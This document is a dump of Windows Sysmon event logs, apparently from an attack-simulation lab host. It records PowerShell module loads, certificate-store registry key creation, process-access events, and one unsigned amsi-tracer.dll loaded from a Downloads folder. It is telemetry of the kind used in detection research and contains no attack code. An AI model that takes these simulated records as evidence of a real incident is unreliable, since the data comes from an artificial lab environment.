Studio®Microsoft Corporationvcruntime140_1.dllMD5=4DC09CA657822C2E8160255F767597DF,SHA256=922124BA0821AA864A0261ED88BD25F8E40F94C24D00D389E23CD9AB2BFC6BA4trueMicrosoft CorporationValid 734700x80000000000000001530578Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\vcruntime140.dll14.28.29913.0 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio®Microsoft Corporationvcruntime140.dllMD5=ADE7AAC069131F54E4294F722C17A412,SHA256=92D50F7C4055718812CD3D823AA2821D6718EB55D2AB2BAC55C2E47260C25A76trueMicrosoft CorporationValid 12241200x80000000000000001530577Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530576Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 734700x80000000000000001530575Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\msvcp140.dll14.28.29913.0 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio®Microsoft Corporationmsvcp140.dllMD5=4B6BA0947F115AE9FD3016D26D57ABB8,SHA256=254DF96324D019A7C4213ABD4178944B8BF2873D0C3EDC1835D4C668F83D7C37trueMicrosoft CorporationValid 12241200x80000000000000001530574Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530573Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530572Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530571Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530570Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530569Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530568Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA\CTLs 12241200x80000000000000001530567Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA\CRLs 12241200x80000000000000001530566Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA\Certificates 12241200x80000000000000001530565Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA 12241200x80000000000000001530564Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA 12241200x80000000000000001530563Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs 12241200x80000000000000001530562Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs 12241200x80000000000000001530561Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates 12241200x80000000000000001530560Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\CA 12241200x80000000000000001530559Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs 734700x80000000000000001530558Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Downloads\amsi-tracer_x64\amsi-tracer.dll-----MD5=C49E4C751F02B9C53B6B3C6F96A95766,SHA256=9FB83A06470A87C619ED92BB6B189D7DE874FE94B46F498A2DFF6877E5759B6Dfalse-Unavailable 12241200x80000000000000001530557Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs 12241200x80000000000000001530556Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates 12241200x80000000000000001530555Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA 12241200x80000000000000001530554Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA 12241200x80000000000000001530553Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs 12241200x80000000000000001530552Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs 12241200x80000000000000001530551Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates 12241200x80000000000000001530550Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\CA 12241200x80000000000000001530549Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs 12241200x80000000000000001530548Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs 12241200x80000000000000001530547Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates 12241200x80000000000000001530546Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\CA 12241200x80000000000000001530545Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\CA 734700x80000000000000001530544Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\amsi.dll10.0.14393.4169 (rs1_release.210107-1130)Anti-Malware Scan InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationamsi.dllMD5=89C79675F7FEDEB6373C9D2045F7B7C5,SHA256=5B40293CF56D44377A91BF68CF2113F523B61185F02DEEAB621BE51F0ADA6131trueMicrosoft WindowsValid 734700x80000000000000001530543Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\crypt32.dll10.0.14393.4350 (rs1_release.210407-2154)Crypto API32Microsoft® Windows® Operating SystemMicrosoft CorporationCRYPT32.DLLMD5=95BA70CFA8087A209500D7D350BF3A59,SHA256=4265157E8DC2A0E32A6328D54181CC31FD24E3017E60B270623C2CDBE5FAB4FAtrueMicrosoft WindowsValid 734700x80000000000000001530542Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=299464D218A27B56684B715365D149FE,SHA256=2BFE4014E06552A9D4201EF9D1C605694AAF2B7B811265EFD91FC6D1C2D48242trueMicrosoft WindowsValid 734700x80000000000000001530541Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\wintrust.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft Trust Verification APIsMicrosoft® Windows® Operating SystemMicrosoft CorporationWINTRUST.DLLMD5=D8CD8451D1E194230F18866AD6EFE5E7,SHA256=9977AA1287962035C24DF806DDA67F09FFE9BDF696DBA507D749C624AE1C178DtrueMicrosoft WindowsValid 734700x80000000000000001530540Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=1AF6CD8B7CE4A852F67AA98C71AA1D26,SHA256=EF0DE008500A8C9C7908383AF11AE55845EBBE28C96C013EA720950BA89D3D28trueMicrosoft WindowsValid 10341000x80000000000000001530539Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.701{21761711-83AD-607D-0C00-00000000BB01}7243060C:\Windows\system32\svchost.exe{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001530538Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.686{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbacff3d0ae5f6e457c31cbf7c94d6a2\System.Management.Automation.ni.dll10.0.14393.4350System.Management.AutomationMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationSystem.Management.Automation.dllMD5=A7509FB104105E590B3AF3F3D8EF9FBB,SHA256=98F1DF763725254FA77D85A880269ED7C3BB4CC2CB9B648C5950925D8FBA6970false-Unavailable 734700x80000000000000001530537Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.686{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001530536Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.686{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001530535Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.686{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 734700x80000000000000001530534Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.686{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\9626a857db364c5cc8c0397184ff6f19\Microsoft.PowerShell.ConsoleHost.ni.dll10.0.14393.3866Microsoft.PowerShell.ConsoleHostMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.PowerShell.ConsoleHost.dllMD5=8C665AE171663A12BE10948B2BA07B86,SHA256=D552DDF56F054CE073331B359029BFEE76691EDE50C44990CCEEB44490C9F47Bfalse-Unavailable 734700x80000000000000001530533Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.686{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\da20d69661026f202acad55611f1f372\System.Core.ni.dll4.8.4330.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Core.dllMD5=0AA216B359BB985E91C06D6CEC347EF2,SHA256=5EDE9B67C3A3A41FCC240B0D7F27764343BD8C1BB1EAC39F441E00C6E5066C92false-Unavailable 734700x80000000000000001530532Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.686{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll4.8.4311.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.dllMD5=D71B052A790A577400CB572A7D4CB69B,SHA256=DE2BE5C6691862A5223BDFEFEE00F33FB6C7A5B2F6DC68124E44EB42D8D3B709false-Unavailable 734700x80000000000000001530531Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.686{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\e150e12dedbd1a8eb71660b9680a9ae7\mscorlib.ni.dll4.8.4311.0 built by: NET48REL1LAST_BMicrosoft Common Language Runtime Class LibraryMicrosoft® .NET FrameworkMicrosoft Corporationmscorlib.dllMD5=CE876D73280DFF17CF3055AB7BFE5C7E,SHA256=CC5303C0076585623C02A29F009104BD8BD4FFBA9E2FB37835289F6A7B98A2EEtrueMicrosoft CorporationValid 734700x80000000000000001530530Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.686{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ucrtbase_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationucrtbase_clr0400.dllMD5=F8F171BE1820544E15B555847005355C,SHA256=CDDF9A2BF085AE59BA464B3BA6394AACFC342DA5F17D77FD5306054C8AABF153trueMicrosoft CorporationValid 734700x80000000000000001530529Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.686{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\vcruntime140_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140_clr0400.dllMD5=63936588122BDEE9624D02CE3F8F54EA,SHA256=21F7E6165CE8DD92DB8CDF48CEE83DE64B2B0807B7B499CF87678B70C6F8C32FtrueMicrosoft CorporationValid 13241300x80000000000000001530528Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.686{21761711-83A4-607D-0100-00000000BB01}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework64/v4.0.30319/clr.dll\\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQWORD (0x01d736d3-0xfdeca44f) 12241200x80000000000000001530527Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.686{21761711-83A4-607D-0100-00000000BB01}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework64/v4.0.30319/clr.dll 734700x80000000000000001530526Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.686{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll4.8.4311.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Common Language Runtime - WorkStationMicrosoft® .NET FrameworkMicrosoft Corporationclr.dllMD5=2C6E4402268C1CCB8FFF2FC7F7BD27E0,SHA256=9B01E4FC480D60A22D62EFEF9857A4371C826DCE8DED10C9E89F3224EF4526E6trueMicrosoft CorporationValid 734700x80000000000000001530525Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.686{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValid 734700x80000000000000001530524Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValid 13241300x80000000000000001530523Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.670{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\JumplistData\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\WindowsPowerShell\v1.0\powershell.exeQWORD (0x01d736d3-0xfdea3e05) 12241200x80000000000000001530522Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.670{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps 12241200x80000000000000001530521Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.670{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\JumplistData 10341000x80000000000000001530520Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}15722576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141a87|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530519Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}15722576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1419f2|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530518Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 